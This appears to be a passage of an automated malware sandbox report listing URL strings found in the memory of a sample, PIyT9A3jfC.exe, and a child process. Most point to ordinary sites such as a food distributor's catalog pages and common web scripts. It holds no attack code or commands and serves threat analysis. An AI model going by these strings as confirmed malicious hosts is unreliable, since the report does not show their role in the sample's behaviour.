                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?520556228c0113270c0c772027905838
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://js.datadome.co/tags.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://napoleongames.be
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&#038;limit=200
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&amp;limit=250&amp;col=class&amp;dir=ASC&amp;term
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizza
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterran
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=mexican
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/respond/1.4.2/respond.min.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
